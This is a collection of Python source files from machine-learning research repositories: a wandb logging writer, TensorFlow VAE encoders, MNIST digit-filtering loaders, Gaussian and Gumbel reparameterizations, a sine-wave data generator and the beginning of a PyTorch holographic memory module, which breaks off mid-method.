'xcosx':i*np.cos(i/r),
'arctanx': numsteps*np.arctan(i/r)}, i)
This function adds three plots:
'xsinx',
'xcosx',
'arctanx'
with the corresponding values.
"""
if global_step is not None and 'epoch' not in tag_scalar_dict:
tag_scalar_dict['epoch'] = global_step
wandb.log(tag_scalar_dict, commit=True)
def add_histogram(self, tag, values, global_step=None, bins='tensorflow'):
"""Add histogram to summary.
Args:
tag (string): Data identifier
values (torch.Tensor, numpy.array, or string/blobname): Values to build histogram
global_step (int): Global step value to record
bins (string): one of {'tensorflow', 'auto', 'fd', ...}, this determines how the bins are made. You can find
other options in: https://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html
"""
hist_dict = {'epoch': global_step, tag: wandb.Histogram(values)}
wandb.log(hist_dict, commit=True)
def add_image(self, tag, img_tensor, global_step=None, caption=None):
"""Add image data to summary.
Note that this requires the ``pillow`` package.
Args:
tag (string): Data identifier
img_tensor (torch.Tensor, numpy.array, or string/blobname): Image data
global_step (int): Global step value to record
Shape:
img_tensor: :math:`(C, H, W)`. Using ``torchvision.utils.make_grid()`` to prepare it is a good idea.
C = colors (can be 1 - grayscale, 3 - RGB, 4 - RGBA)
"""
img_dict = {'epoch': global_step, tag: wandb.Image(img_tensor, caption=caption)}
wandb.log(img_dict, commit=True)
def add_figure(self, tag, figure, global_step=None, close=True):
"""Render matplotlib figure into an image and add it to summary.
Note that this requires the ``matplotlib`` package.
Args:
tag (string): Data identifier
figure (matplotlib.pyplot.figure) or list of figures: figure or a list of figures
global_step (int): Global step value to record
close (bool): Flag to automatically close the figure
"""
self.add_image(tag, figure_to_image(figure, close), global_step)
def add_video(self, tag, vid_tensor, global_step=None, fps=4):
"""Add video data to summary.
Note that this requires the ``moviepy`` package.
Args:
tag (string): Data identifier
vid_tensor (torch.Tensor): Video data
global_step (int): Global step value to record
fps (float or int): Frames per second
Shape:
vid_tensor: :math:`(B, C, T, H, W)`. (if following tensorboardX format)
vid_tensor: :math:`(T, H, W, C)`. (if following visdom format)
B = batches, C = colors (1, 3, or 4), T = time frames, H = height, W = width
"""
vid_dict = {'epoch': global_step, tag: wandb.Video(vid_tensor, fps=fps, format="gif")}
wandb.log(vid_dict, commit=True)
def add_audio(self, tag, snd_tensor, global_step=None, sample_rate=44100, caption=None):
"""Add audio data to summary.
Args:
tag (string): Data identifier
snd_tensor (torch.Tensor, numpy.array, or string/blobname): Sound data
global_step (int): Global step value to record
sample_rate (int): sample rate in Hz
Shape:
snd_tensor: :math:`(1, L)`. The values should lie between [-1, 1].
"""
wandb.log({tag: [wandb.Audio(snd_tensor, caption=caption, sample_rate=sample_rate/1000.)],
'epoch': global_step}, commit=True)
def add_text(self, tag, text_string, global_step=None, append=False):
"""Add text data to summary.
Args:
tag (string): Data identifier
text_string (string): String to save
global_step (int): Global step value to record
Examples::
writer.add_text('lstm', 'This is an lstm', 0)
writer.add_text('rnn', 'This is an rnn', 10)
"""
wandb.run.summary[tag] = text_string
def add_pr_curve(self, tag, labels, predictions, global_step=None, num_thresholds=127, weights=None):
"""Adds precision recall curve.
Args:
tag (string): Data identifier
labels (torch.Tensor, numpy.array, or string/blobname): Ground truth data. Binary label for each element.
predictions (torch.Tensor, numpy.array, or string/blobname):
The probability that an element be classified as true. Value should in [0, 1]
global_step (int): Global step value to record
num_thresholds (int): Number of thresholds used to draw the curve.
"""
labels, predictions = make_np(labels), make_np(predictions)
pr_dict = {tag: wandb.plots.precision_recall(y_true=labels, y_probas=predictions),
'epoch': global_step}
wandb.log(pr_dict, commit=True)
def save(self):
"""Commits a set of logs."""
wandb.log({})
def close(self):
pass
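# Minimal usage sketch (assumes a reachable wandb server and an existing torch
# model `net`; the env/server/log_folder values below are placeholders):
#   writer = WandBWriter(env='my_experiment', server='http://localhost',
#                        config={'lr': 1e-3}, model=net, log_folder='~/logs')
#   writer.add_scalar('train/loss', 0.42, global_step=1)
#   writer.save()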
``` |
{
"source": "jramapuram/LifelongVAE",
"score": 2
} |
#### File: jramapuram/LifelongVAE/encoders.py
```python
import tensorflow as tf
import tensorflow.contrib.slim as slim
# from tensorflow.contrib.slim.nets import resnet_v2, resnet_utils
def copy_layer(sess, src_layer, src_scope, dest_layer, dst_scope):
src_vars = [v for v in tf.global_variables()
if src_layer.scope in v.name and src_scope in v.name]
dest_vars = [v for v in tf.global_variables()
if dest_layer.scope in v.name and dst_scope in v.name]
copy_ops = []
for s, d in zip(src_vars, dest_vars):
if ('BatchNorm' not in s.name or 'BatchNorm' not in d.name) \
and ('Adam' not in s.name or 'Adam' not in d.name):
if s.get_shape().as_list() == d.get_shape().as_list():
print 'copying %s [%s] --> %s [%s]' \
% (s.name, s.get_shape().as_list(),
d.name, d.get_shape().as_list())
copy_ops.append(d.assign(s))
sess.run(copy_ops)
def reinit_last_layer(sess, dest_layer):
dst_proj_vars = [v for v in tf.global_variables()
if dest_layer.scope in v.name
and 'projection' in v.name]
print 'proj_vars = ', dst_proj_vars
reinit_ops = [d.initializer for d in dst_proj_vars]
sess.run(reinit_ops)
def _get_normalizer(is_training, use_bn, use_ln):
'''
Helper to get normalizer function and params
'''
batch_norm_params = {'is_training': is_training,
'decay': 0.999, 'center': True,
'scale': True, 'updates_collections': None}
layer_norm_params = {'center': True, 'scale': True}
if use_ln:
print 'using layer norm'
normalizer_fn = slim.layer_norm
normalizer_params = layer_norm_params
elif use_bn:
print 'using batch norm'
normalizer_fn = slim.batch_norm
normalizer_params = batch_norm_params
else:
print 'not using any layer normalization scheme'
normalizer_fn = None
normalizer_params = None
return [normalizer_fn, normalizer_params]
def forward(inputs, operator):
'''
Helper function to forward pass on the inputs using the provided model
'''
return operator.get_model(inputs)
class CNNEncoder(object):
def __init__(self, sess, latent_size, is_training,
activation=tf.nn.elu, df_dim=32,
use_bn=False, use_ln=False,
scope="cnn_encoder"):
self.sess = sess
self.layer_type = "cnn"
self.df_dim = df_dim
self.latent_size = latent_size
self.activation = activation
self.use_bn = use_bn
self.use_ln = use_ln
self.scope = scope
self.is_training = is_training
def get_info(self):
return {'activation': self.activation.__name__,
'latent_size': self.latent_size,
'sizes': self.get_sizing(),
'use_bn': str(self.use_bn),
'use_ln': str(self.use_ln)}
def get_sizing(self):
return '4_5x5xN_s2_fc%d' % (self.latent_size)
def get_detailed_sizing(self):
return 's2_5x5x%d_' % self.df_dim \
+ 's2_5x5x%d_' % (self.df_dim*2) \
+ 's2_5x5x%d_' % (self.df_dim*4) \
+ 's2_5x5x%d_' % (self.df_dim*8) \
+ 'fc%d' % self.latent_size
def get_model(self, x):
# get the normalizer function and parameters
normalizer_fn, normalizer_params = _get_normalizer(self.is_training,
self.use_bn,
self.use_ln)
# winit = tf.contrib.layers.xavier_initializer_conv2d()
winit = tf.truncated_normal_initializer(stddev=0.02)
with tf.variable_scope(self.scope):
with slim.arg_scope([slim.conv2d],
activation_fn=self.activation,
weights_initializer=winit,
biases_initializer=tf.constant_initializer(0),
normalizer_fn=normalizer_fn,
normalizer_params=normalizer_params):
xshp = x.get_shape().as_list()
x_flat = x if len(xshp) == 4 else tf.expand_dims(x, -1)
print("xflat = ", x_flat.get_shape().as_list())
h0 = slim.conv2d(x_flat, self.df_dim, [5, 5], stride=1, padding='VALID')
h1 = slim.conv2d(h0, self.df_dim*2, [4, 4], stride=2, padding='VALID')
h2 = slim.conv2d(h1, self.df_dim*4, [4, 4], stride=1, padding='VALID')
h3 = slim.conv2d(h2, self.df_dim*8, [4, 4], stride=2, padding='VALID')
h4 = slim.conv2d(h3, self.df_dim*16, [4, 4], stride=1, padding='VALID')
h5 = slim.conv2d(h4, self.df_dim*16, [1, 1], stride=1, padding='VALID')
h6 = slim.conv2d(h5, self.latent_size, [1, 1], stride=1, padding='VALID',
weights_initializer=winit,
biases_initializer=tf.constant_initializer(0),
activation_fn=None, normalizer_fn=None)
print('conv encoded final = ', h6.get_shape().as_list())
return tf.reshape(h6, [xshp[0], -1])
class DenseEncoder(object):
def __init__(self, sess, latent_size, is_training,
activation=tf.nn.elu,
sizes=[512, 512], use_bn=False, use_ln=False,
double_features=False,
scope="dense_encoder"):
self.sess = sess
self.layer_type = "dnn"
self.latent_size = latent_size
self.activation = activation
self.sizes = sizes
self.use_bn = use_bn
self.use_ln = use_ln
self.scope = scope
self.double_features = 2 if double_features else 1
self.is_training = is_training
def get_info(self):
return {'activation': self.activation.__name__,
'latent_size': self.latent_size,
'sizes': str(self.sizes),
'use_bn': str(self.use_bn),
'use_ln': str(self.use_ln)}
def get_sizing(self):
return str(self.sizes)
def get_model(self, inputs):
# get the normalizer function and parameters
normalizer_fn, normalizer_params = _get_normalizer(self.is_training,
self.use_bn,
self.use_ln)
winit = tf.contrib.layers.xavier_initializer()
binit = tf.constant_initializer(0)
with tf.variable_scope(self.scope):
with slim.arg_scope([slim.fully_connected],
activation_fn=self.activation,
weights_initializer=winit,
biases_initializer=binit,
normalizer_fn=normalizer_fn,
normalizer_params=normalizer_params):
layers = slim.stack(inputs, slim.fully_connected,
self.sizes, scope="layer")
output_size = self.latent_size * self.double_features
return slim.fully_connected(layers, output_size,
activation_fn=None,
normalizer_fn=None,
weights_initializer=winit,
biases_initializer=binit,
scope='projection')
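# Illustrative usage (TF1 graph mode; `sess`, the placeholder shape and the
# layer sizes are assumptions for this sketch, not values used in this file):
#   x = tf.placeholder(tf.float32, [None, 784])
#   enc = DenseEncoder(sess, latent_size=32, is_training=True, sizes=[256, 256])
#   z_logits = enc.get_model(x)  # -> [None, 32]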
```
#### File: jramapuram/LifelongVAE/mnist_number.py
```python
import os
import h5py
import numpy as np
from copy import deepcopy
from tensorflow.examples.tutorials.mnist import input_data
from itertools import compress
from utils import zip_filter_unzip
from scipy.misc import imrotate as rotate
from scipy.misc import imresize as imresize
# An object that filters MNIST to a single number
class MNIST_Number(object):
def __init__(self, number, mnist, is_one_vs_all=False,
is_flat=True, resize_dims=None,
convert_to_rgb=False):
self.input_size = len(mnist.train.images[0])
self.number = number # the number to filter out
self.is_one_vs_all = is_one_vs_all
if not is_one_vs_all:
self.blacklist = list(np.arange(11))
self.blacklist.remove(self.number)
else:
self.blacklist = [1] # the 'other' class
# filter out all other numbers
self.mnist = MNIST_Number.filter_numbers(mnist, self.blacklist)
# return images in [batch, row, col]
if not is_flat:
self.mnist = MNIST_Number._unflatten_mnist(self.mnist)
# resizes images if resize_dims tuple is provided
if resize_dims is not None:
self.mnist = MNIST_Number.resize_mnist(self.mnist, resize_dims)
# tile images as [img, img, img]
if convert_to_rgb:
self.mnist = MNIST_Number.bw_to_rgb_mnist(self.mnist)
@staticmethod
def _unflatten_mnist(mnist):
mnist.train._images = mnist.train._images.reshape([-1, 28, 28])
mnist.validation._images = mnist.validation._images.reshape([-1, 28, 28])
mnist.test._images = mnist.test._images.reshape([-1, 28, 28])
return mnist
@staticmethod
def resize_mnist(mnist, new_dims):
mnist.train._images = MNIST_Number.resize_images(mnist.train._images, new_dims)
mnist.validation._images = MNIST_Number.resize_images(mnist.validation._images, new_dims)
mnist.test._images = MNIST_Number.resize_images(mnist.test._images, new_dims)
return mnist
@staticmethod
def bw_to_rgb_mnist(mnist):
mnist.train._images = MNIST_Number.bw_to_rgb(mnist.train._images)
mnist.validation._images = MNIST_Number.bw_to_rgb(mnist.validation._images)
mnist.test._images = MNIST_Number.bw_to_rgb(mnist.test._images)
return mnist
@staticmethod
def resize_images(imgs, new_dims, flatten=False):
flattened_dims = [-1, np.prod(new_dims)] if flatten else [-1] + new_dims
return np.vstack([imresize(img.reshape(28, 28),
new_dims).reshape(flattened_dims)
for img in imgs]) / 255.
@staticmethod
def bw_to_rgb(imgs):
return np.vstack([np.tile(img.reshape(img.shape[0], img.shape[1], 1), 3)
.reshape(-1, img.shape[0], img.shape[1], 3)
for img in imgs])
@staticmethod
def _rotate_batch(batch, angle):
return np.vstack([rotate(x_i.reshape(28, 28), angle).reshape([-1, 28*28])
for x_i in batch]) / 255.
@staticmethod
def _check_and_load_angle(angle, number, base_path='MNIST_data'):
''' Returns None if the file doesn't exist '''
filename = os.path.join(base_path, "mnist_num%d_angle%d.hdf5"
% (number, angle))
if os.path.exists(filename):
f = h5py.File(filename, "r")
return f['train'][()], f['validation'][()], f['test'][()]
# return f['train'], f['validation'], f['test']
return None
@staticmethod
def _check_and_write_angle(angle, number, mnist, base_path='MNIST_data'):
''' serializes the rotated number to disk as a hdf5 file'''
filename = os.path.join(base_path, "mnist_num%d_angle%d.hdf5"
% (number, angle))
if not os.path.exists(filename):
f = h5py.File(filename, "w")
f['train'] = mnist.train._images
f['validation'] = mnist.validation._images
f['test'] = mnist.test._images
print 'serialized %s to disk...' % filename
@staticmethod
def rotate_all_sets(mnist, number, angle):
hpf5_load = MNIST_Number._check_and_load_angle(angle, number)
if hpf5_load is not None:
train_imgs = np.asarray(hpf5_load[0], np.float32)
validation_imgs = np.asarray(hpf5_load[1], np.float32)
test_imgs = np.asarray(hpf5_load[2], np.float32)
else:
train_imgs = MNIST_Number._rotate_batch(mnist.train._images, angle)
validation_imgs = MNIST_Number._rotate_batch(mnist.validation._images, angle)
test_imgs = MNIST_Number._rotate_batch(mnist.test._images, angle)
mnist.train._images = train_imgs
mnist.validation._images = validation_imgs
mnist.test._images = test_imgs
MNIST_Number._check_and_write_angle(angle, number, mnist)
return mnist
@staticmethod
def filter_numbers(mnist, blacklist):
digits = deepcopy(mnist)
digits.train._images, digits.train._labels = zip_filter_unzip(digits.train._images
, digits.train._labels
, blacklist)
digits.train._images = np.array(digits.train._images)
digits.train._labels = np.array(digits.train._labels)
digits.train._num_examples = len(digits.train.images)
digits.validation._images, digits.validation._labels = zip_filter_unzip(digits.validation._images
, digits.validation._labels
, blacklist)
digits.validation._num_examples = len(digits.validation.images)
digits.validation._images = np.array(digits.validation._images)
digits.validation._labels = np.array(digits.validation._labels)
digits.test._images, digits.test._labels = zip_filter_unzip(digits.test._images
, digits.test._labels
, blacklist)
digits.test._images = np.array(digits.test._images)
digits.test._labels = np.array(digits.test._labels)
digits.test._num_examples = len(digits.test.images)
return digits
# if one vs. all then 0 = true class, 1 = other
# otherwise we just use lbl = lbl, 10 = other
def _augment(self, images, labels):
indexer = np.array(labels == self.number)
if self.is_one_vs_all:
return zip(*((im, 0) if ind else (im, 1)
for im, lbl, ind in zip(images, labels, indexer)))
else:
return zip(*((im, lbl) if ind else (im, 10)
for im, lbl, ind in zip(images, labels, indexer)))
def get_train_batch_iter(self, batch_size):
images, labels = self.mnist.train.next_batch(batch_size)
#images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def get_validation_batch_iter(self, batch_size):
images, labels = self.mnist.validation.next_batch(batch_size)
#images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def _get_test_batch_iter(self, batch_size):
images, labels = self.mnist.test.next_batch(batch_size)
images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def get_test_batch_iter(self, batch_size):
images = []; labels = []; count = 0
while(count < batch_size):
max_batch = self.mnist.test._num_examples
im, lbl = self._get_test_batch_iter(max_batch)
tar = 0 if self.is_one_vs_all else self.number
if tar in lbl:
im, lbl = zip_filter_unzip(im, lbl, self.blacklist)
count += len(im)
# im = np.asarray(im); lbl = np.asarray(lbl); count += len(lbl)
images.append(im); labels.append(lbl)
return np.vstack(images)[0:batch_size], np.hstack(labels)[0:batch_size]
def get_batch_iter(self, batch_size):
images = []; labels = []; count = 0
while(count < batch_size):
im, lbl = self.get_train_batch_iter(batch_size)
tar = 0 if self.is_one_vs_all else self.number
if tar in lbl:
# im, lbl = zip_filter_unzip(im, lbl, self.blacklist)
im = np.asarray(im); lbl = np.asarray(lbl); count += len(lbl)
images.append(im); labels.append(lbl)
return np.vstack(images)[0:batch_size], np.hstack(labels)[0:batch_size]
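# Usage sketch (Python 2; assumes MNIST_data/ can be downloaded/read): build a
# filtered loader for the digit 2 using the module-level `full_mnist` defined below.
#   two = MNIST_Number(2, full_mnist)
#   imgs, lbls = two.get_batch_iter(32)  # imgs: [32, 784], lbls: [32] (all == 2)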
class AllMnist():
def __init__(self, one_hot=True,
is_flat=True,
resize_dims=None,
convert_to_rgb=False):
self.mnist = input_data.read_data_sets('MNIST_data', one_hot=one_hot)
self.one_hot = one_hot
self.number = 99997 # XXX
self.num_examples = self.mnist.test._num_examples
# return images in [batch, row, col]
if not is_flat:
self.mnist = MNIST_Number._unflatten_mnist(self.mnist)
# resizes images if resize_dims tuple is provided
if resize_dims is not None:
self.mnist = MNIST_Number.resize_mnist(self.mnist, resize_dims)
# tile images as [img, img, img]
if convert_to_rgb:
self.mnist = MNIST_Number.bw_to_rgb_mnist(self.mnist)
def get_train_batch_iter(self, batch_size):
images, labels = self.mnist.train.next_batch(batch_size)
#images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def get_validation_batch_iter(self, batch_size):
images, labels = self.mnist.validation.next_batch(batch_size)
#images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def _get_test_batch_iter(self, batch_size):
images, labels = self.mnist.test.next_batch(batch_size)
images, labels = self._augment(images, labels)
return np.array(images), np.array(labels)
def get_test_batch_iter(self, batch_size):
return self._get_test_batch_iter(batch_size)
def get_batch_iter(self, batch_size):
return self.get_train_batch_iter(batch_size)
# Read mnist only once [~ 230Mb]
full_mnist = input_data.read_data_sets('MNIST_data', one_hot=False)
# full_mnist.train._images /= 255.
# full_mnist.validation._images /= 255.
# full_mnist.test._images /= 255.
```
#### File: jramapuram/LifelongVAE/reparameterizations.py
```python
import tensorflow as tf
import tensorflow.contrib.distributions as d
from utils import gumbel_softmax, shp
sg = tf.contrib.bayesflow.stochastic_graph
st = tf.contrib.bayesflow.stochastic_tensor
def gaussian_reparmeterization(logits_z, rnd_sample=None):
'''
The vanilla gaussian reparameterization from Kingma et al.
z = mu + sigma * N(0, I)
'''
zshp = logits_z.get_shape().as_list()
assert zshp[1] % 2 == 0
q_sigma = 1e-6 + tf.nn.softplus(logits_z[:, 0:zshp[1]/2])
q_mu = logits_z[:, zshp[1]/2:]
# Prior
p_z = d.Normal(loc=tf.zeros(zshp[1] / 2),
scale=tf.ones(zshp[1] / 2))
with st.value_type(st.SampleValue()):
q_z = st.StochasticTensor(d.Normal(loc=q_mu, scale=q_sigma))
reduce_index = [1] if len(zshp) == 2 else [1, 2]
kl = d.kl_divergence(q_z.distribution, p_z, allow_nan_stats=False)
return [q_z, tf.reduce_sum(kl, reduce_index)]
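# Shape sketch (assumes a TF1 graph): for logits of shape [B, 2H] interpreted as
# [pre-softplus sigma | mu], the returned sample tensor has shape [B, H] and the
# KL term has shape [B], e.g.
#   logits = tf.zeros([4, 10])
#   z, kl = gaussian_reparmeterization(logits)  # z: [4, 5], kl: [4]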
# def gaussian_reparmeterization(logits_z, rnd_sample=None):
# '''
# The vanilla gaussian reparameterization from Kingma et. al
# z = mu + sigma * N(0, I)
# '''
# zshp = logits_z.get_shape().as_list()
# assert zshp[1] % 2 == 0
# z_log_sigma_sq = logits_z[:, 0:zshp[1]/2]
# z_mean = logits_z[:, zshp[1]/2:]
# print 'zmean shp = ', z_mean.get_shape().as_list()
# print 'z_log_sigma_sq shp = ', z_log_sigma_sq.get_shape().as_list()
# if rnd_sample is None:
# rnd_sample = tf.random_normal(tf.shape(z_mean), 0, 1,
# dtype=tf.float32)
# # cov = tf.multiply(tf.sqrt(tf.exp(z_log_sigma_sq)), rnd_sample)
# # softplus = log(exp(features) + 1)
# cov = tf.multiply(tf.sqrt(tf.nn.softplus(z_log_sigma_sq)), rnd_sample)
# z = tf.add(z_mean, cov, name="z")
# reduce_index = [1] if len(zshp) == 2 else [1, 2]
# kl = -0.5 * tf.reduce_sum(1.0 + z_log_sigma_sq - tf.square(z_mean)
# - tf.nn.softplus(z_log_sigma_sq), reduce_index)
# # kl = -0.5 * tf.reduce_sum(1.0 + z_log_sigma_sq - tf.square(z_mean)
# # - tf.exp(z_log_sigma_sq), reduce_index)
# return [z, kl]
def gumbel_reparmeterization(logits_z, tau, rnd_sample=None,
hard=True, eps=1e-9):
'''
The gumbel-softmax reparameterization
'''
latent_size = logits_z.get_shape().as_list()[1]
# Prior
p_z = d.OneHotCategorical(probs=tf.constant(1.0/latent_size,
shape=[latent_size]))
# p_z = d.RelaxedOneHotCategorical(probs=tf.constant(1.0/latent_size,
# shape=[latent_size]),
# temperature=10.0)
# p_z = 1.0 / latent_size
# log_p_z = tf.log(p_z + eps)
with st.value_type(st.SampleValue()):
q_z = st.StochasticTensor(d.RelaxedOneHotCategorical(temperature=tau,
logits=logits_z))
q_z_full = st.StochasticTensor(d.OneHotCategorical(logits=logits_z))
reduce_index = [1] if len(logits_z.get_shape().as_list()) == 2 else [1, 2]
kl = d.kl_divergence(q_z_full.distribution, p_z, allow_nan_stats=False)
if len(shp(kl)) > 1:
return [q_z, tf.reduce_sum(kl, reduce_index)]
else:
return [q_z, kl]
# reduce_index = [1] if len(logits_z.get_shape().as_list()) == 2 else [1, 2]
# kl = tf.reduce_sum(tf.reshape(q_z.distribu * (log_q_z - p_z. log_p_z),
# [-1, latent_size]), reduce_index)
# return [z, kl]
# def gumbel_reparmeterization(logits_z, tau, rnd_sample=None,
# hard=True, eps=1e-9):
# '''
# The gumbel-softmax reparameterization
# '''
# latent_size = logits_z.get_shape().as_list()[1]
# q_z = tf.nn.softmax(logits_z)
# log_q_z = tf.log(q_z + eps)
# p_z = 1.0 / latent_size
# log_p_z = tf.log(p_z + eps)
# # set hard=True for ST Gumbel-Softmax
# z = tf.reshape(gumbel_softmax(logits_z, tau,
# hard=hard,
# rnd_sample=rnd_sample),
# [-1, latent_size])
# print 'z_gumbel = ', z.get_shape().as_list()
# # kl = tf.reshape(p_z * (log_p_z - log_q_z),
# # [-1, latent_size])
# reduce_index = [1] if len(logits_z.get_shape().as_list()) == 2 else [1, 2]
# kl = tf.reduce_sum(tf.reshape(q_z * (log_q_z - log_p_z),
# [-1, latent_size]), reduce_index)
# return [z, kl]
``` |
{
"source": "jramapuram/LSTM_Autoencoder",
"score": 3
} |
#### File: jramapuram/LSTM_Autoencoder/data_generator.py
```python
__author__ = 'jramapuram'
import numpy as np
from data_source import DataSource
from random import randint
from math import sin, pi
from data_manipulator import window, split, normalize
# from sklearn.cross_validation import train_test_split
class DataGenerator(DataSource):
def __init__(self, conf, plotter):
self.conf = conf
self.p = plotter
self.data = np.matrix([])
self.x_train = np.matrix([])
self.x_test = np.matrix([])
self.y_train = np.array([])
self.y_test = np.array([])
self.noise_count = 0
@staticmethod
def generate_sin_wave(input_size, num_waves, offset=1):
delta = 2 * pi / (input_size - offset) # for proper shifting
one_wave = [sin(delta * i) for i in xrange(0, input_size)]
return normalize(np.array(one_wave * num_waves)).flatten()
# return one_wave * num_waves
def add_amplitude_noise(self, signal, num_errors=1):
# signal = np.array(signal)
max_len = len(signal)
for i in xrange(0, num_errors):
location = randint(0, max_len - 1)
signal[location] = signal[location] + np.random.normal(5, 0.1) # TODO: parameterize this
self.noise_count += 1
return signal
def read_data(self):
wave = self.generate_sin_wave(int(self.conf['--input_dim'])
, int(self.conf['--num_periods']))
self.p.plot_wave(wave, 'train')
generator = window(wave, int(self.conf['--input_dim']))
self.data = np.array([item for item in generator])
self.x_train, self.x_test = split(self.data, float(self.conf['--test_ratio']))
self.x_test = self.add_amplitude_noise(self.x_test, 13) # XXX
print self.x_train.shape, self.x_test.shape
return self.x_train
def split_data(self):
if self.data.size == 0:
self.read_data()
# TODO: Generate a y output vector where noise is added
return (self.x_train, self.y_train), (self.x_test, self.y_test)
def get_noise_count(self):
return self.noise_count
``` |
{
"source": "jramapuram/memory",
"score": 3
} |
#### File: jramapuram/memory/holographic_memory.py
```python
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class Complex(object):
''' Simple Complex Number Class for pytorch '''
def __init__(self, real, imag=None):
''' if imag is None we split real into halves --> [re, im] '''
if imag is not None:
assert real.size() == imag.size(), "{}re != {}im".format(
real.size(), imag.size())
self._real = real
self._imag = imag
else:
assert real.size(-1) % 2 == 0, "need to be div by two"
assert real.dim() == 2, "only 2d supported"
half = real.size(-1) // 2
self._real = real[:, 0:half]
self._imag = real[:, half:]
def unstack(self):
return torch.cat([self._real, self._imag], dim=-1)
def __add__(self, other):
real = self._real + other._real
imag = self._imag + other._imag
return Complex(real, imag)
def __sub__(self, other):
real = self._real - other._real
imag = self._imag - other._imag
return Complex(real, imag)
def __mul__(self, other):
real = self._real * other._real + self._imag * other._imag
imag = self._real * other._imag + self._imag * other._real
return Complex(real, imag)
def __rmul__(self, other):
real = other._real * self._real + other._imag * self._imag
imag = other._imag * self._real + other._real * self._imag
return Complex(real, imag)
def abs(self):
return torch.sqrt(self._real * self._real + self._imag * self._imag)
def conj(self):
return Complex(self._real, -self._imag)
def size(self):
return self._real.size()
def real(self):
return self._real
def imag(self):
return self._imag
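# Minimal usage sketch of Complex: a [B, 2H] tensor is split into real/imag halves.
#   c = Complex(torch.ones(2, 4))      # real = ones(2, 2), imag = ones(2, 2)
#   c.abs()                            # -> sqrt(2) everywhere, shape [2, 2]
#   c.conj().unstack()                 # -> shape [2, 4] with the imag half negated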
def long_type(use_cuda):
return torch.cuda.LongTensor if use_cuda else torch.LongTensor
def float_type(use_cuda):
return torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
def one_hot(num_cols, indices, use_cuda=False):
""" Creates a matrix of one hot vectors.
- num_cols: int
- indices: FloatTensor array
"""
batch_size = indices.size(0)
mask = long_type(use_cuda)(batch_size, num_cols).fill_(0)
ones = 1
if isinstance(indices, Variable):
ones = Variable(long_type(use_cuda)(indices.size()).fill_(1))
mask = Variable(mask, volatile=indices.volatile)
return mask.scatter_(1, indices, ones)
def circular_convolution_conv(keys, values, cuda=False):
'''
For the circular convolution of x and y to be equivalent,
you must pad the vectors with zeros to length at least N + L - 1
before you take the DFT. After you invert the product of the
DFTs, retain only the first N + L - 1 elements.
'''
assert values.dim() == keys.dim() == 2, "only 2 dims supported"
batch_size = keys.size(0)
keys_feature_size = keys.size(1)
values_feature_size = values.size(1)
required_size = keys_feature_size + values_feature_size - 1
# zero pad upto N+L-1
zero_for_keys = Variable(float_type(cuda)(
batch_size, required_size - keys_feature_size).zero_())
zero_for_values = Variable(float_type(cuda)(
batch_size, required_size - values_feature_size).zero_())
keys = torch.cat([keys, zero_for_keys], -1)
values = torch.cat([values, zero_for_values], -1)
# do the conv and reshape and return
print('values = ', values.view(batch_size, 1, -1).size(), ' keys = ', keys.view(batch_size, 1, -1).size())
print('conv = ', F.conv1d(values.view(batch_size, 1, -1),
keys.view(batch_size, 1, -1)).size())
return F.conv1d(values.view(batch_size, 1, -1),
keys.view(batch_size, 1, -1)).squeeze()[:, 0:required_size]
def circular_convolution_fft(keys, values, normalized=True, conj=False, cuda=False):
'''
For the circular convolution of x and y to be equivalent,
you must pad the vectors with zeros to length at least N + L - 1
before you take the DFT. After you invert the product of the
DFTs, retain only the first N + L - 1 elements.
'''
assert values.dim() == keys.dim() == 2, "only 2 dims supported"
assert values.size(-1) % 2 == keys.size(-1) % 2 == 0, "need last dim to be divisible by 2"
batch_size, keys_feature_size = keys.size(0), keys.size(1)
values_feature_size = values.size(1)
required_size = keys_feature_size + values_feature_size - 1
required_size = required_size + 1 if required_size % 2 != 0 else required_size
# conj transpose
keys = Complex(keys).conj().unstack() if conj else keys
# reshape to [batch, [real, imag]]
half = keys.size(-1) // 2
keys = torch.cat([keys[:, 0:half].unsqueeze(2), keys[:, half:].unsqueeze(2)], -1)
values = torch.cat([values[:, 0:half].unsqueeze(2), values[:, half:].unsqueeze(2)], -1)
# do the fft, ifft and return num_required
kf = torch.fft(keys, signal_ndim=1, normalized=normalized)
vf = torch.fft(values, signal_ndim=1, normalized=normalized)
kvif = torch.ifft(kf*vf, signal_ndim=1, normalized=normalized)#[:, 0:required_size]
# if conj:
# return Complex(kvif[:, :, 1], kvif[:, :, 0]).unstack()
#return Complex(kvif[:, :, 0], kvif[:, :, 1]).abs() if not conj \
# return Complex(kvif[:, :, 0], kvif[:, :, 1]).unstack() # if not conj \
# else Complex(kvif[:, :, 1], kvif[:, :, 0]).abs()
return Complex(kvif[:, :, 0], kvif[:, :, 1]).unstack().view(batch_size, -1)
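# Shape sketch: keys and values are stacked as [real | imag] along the last dim,
# so for keys, values of shape [B, 2H] the result is also [B, 2H], e.g.
#   k, v = torch.randn(4, 32), torch.randn(4, 32)
#   out = circular_convolution_fft(k, v)   # -> torch.Size([4, 32])
# (this relies on the pre-1.8 torch.fft/torch.ifft function API)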
class HolographicMemory(nn.Module):
def __init__(self, num_init_memories, normalization='complex', cuda=True):
super(HolographicMemory, self).__init__()
self.perms, self.inv_perms, self.memories = None, None, None
self.num_memories = num_init_memories
self.complex_normalize = normalization == 'complex'
self.l2_normalize = normalization == 'l2'
self.conv_fn = circular_convolution_fft
self.cuda = cuda
@staticmethod
def _generate_perms_and_inverses(feature_size, num_perms):
perms = [torch.randperm(feature_size)
for _ in range(num_perms)]
inv_perms = [torch.cat([(perm == i).nonzero()
for i in range(feature_size)], 0).squeeze()
for perm in perms]
return perms, inv_perms
def normalize(self, arr):
if self.complex_normalize:
return self._complex_normalize(arr)
return F.normalize(arr, dim=-1)
def _complex_normalize(self, arr):
assert arr.size(-1) % 2 == 0, "dim[-1] need to be divisible by 2"
half = arr.size(-1) // 2
cplx = Complex(arr[:, 0:half], arr[:, half:]).abs()
mag = torch.max(cplx, torch.ones_like(cplx))
return arr / torch.cat([mag, mag], -1)
def encode(self, keys, values):
'''
Encodes the given keys and values together
values: [batch_size, feature_size]
keys: [batch_size, feature_size]
sets memories: [num_memories, features]
'''
assert values.dim() == keys.dim() == 2, "only operate over 2 dims"
batch_size, feature_size = list(values.size())
if self.perms is None:
